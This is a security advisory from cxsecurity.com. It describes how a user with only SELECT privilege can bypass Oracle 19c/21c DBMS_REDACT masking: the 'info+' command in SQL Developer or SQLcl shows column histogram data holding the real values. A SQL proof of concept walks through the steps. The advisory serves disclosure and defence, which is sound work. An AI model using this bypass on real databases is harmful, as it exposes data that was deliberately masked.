Oracle DBMS_REDACT Dynamic Data Masking Bypass

2023.01.03
Credit: Emad Al-Mousa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: ByPassing DBMS_REDACT Dynamic Data Masking security feature in Oracle database system Product: Database Manufacturer: Oracle Affected Version(s): 19c,21c Tested Version(s): 19c,21c CVE Reference: N/A Author of Advisory: Emad Al-Mousa Overview: DBMS_REDACT package provides an interface to Oracle Data Redaction, which enables you to mask (redact) data that is returned from SQL queries. Basically, its dynamic data masking. security policies are configured and enabled through dbms_redact package. This is a security feature but doesn't provide a bullet proof data protection, as I will simulate how easily it can be bypassed and masked datacan be extracted/viewed. ************************************************** Proof of Concept (PoC): In the database I will create a table called HR.TABLE2 and will create an index on SALES column and insert dummy tables. SQL> CREATE TABLE HR.TABLE2( COMPANY_NAME VARCHAR2(10 BYTE), REGION VARCHAR2(10 BYTE), SALES NUMBER(12), DIVISION_NAME VARCHAR2(12)); SQL> CREATE INDEX HR.IDX_TABLE2_SALES ON HR.TABLE2(SALES); SQL> Insert into HR.TABLE2 values ('COMPANY_A','EU',120000000,'INDUSTRIAL'); SQL> Insert into HR.TABLE2 values ('COMPANY_B','ASIA',170000000,'RETAIL'); SQL> Insert into HR.TABLE2 values ('COMPANY_C','ME',40000000,'SHIPMENT'); SQL> Insert into HR.TABLE2 values ('COMPANY_D','AFRICA',11000000,'FARMING'); SQL> Insert into HR.TABLE2 values ('COMPANY_E','LATIN-AM',114000000,'SHIPMENT'); SQL> Insert into HR.TABLE2 values ('COMPANY_F','NORTH-AM',190000000,'RETAIL'); SQL> commit; I will create a redaction policy as SYS user against “SALES” column in the table HR.TABLE2: sqlplus / as sysdba SQL> begin dbms_redact.add_policy( object_schema => 'HR', object_name => 'TABLE2', column_name => 'SALES', policy_name => 'REDACT_HR_SALES', function_type => DBMS_REDACT.FULL, expression => '1=1'); end;/ I will create a user called "roro" in the pluggable database ORCLPDB1 with “create session” and "SELECT" permission ONLY on the table: sqlplus / as sysdba SQL> alter session set container=ORCLPDB1;SQL> create user roro identified by dummy_123;SQL> grant select on HR.TABLE2 to roro; connecting using account roro to the database using "SQL Developer Tool" or SQLCL and execute the following command: info+ HR.TABLE2; The histogram data for SALES column will show the actual vaules stored in the redacted column. Conclusion: So the security feature was bypassed with no excessive privileges required to be granted to the database account, I utilized the info+ command only. ************************************************** References: https://docs.oracle.com/database/121/ASOAG/introduction-to-oracle-data-redaction.htm#ASOAG852 https://databasesecurityninja.wordpress.com/2023/01/03/bypassing-dbms_redact-dynamic-data-masking-security-feature-in-oracle-database-system/ Thanks,Emad


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top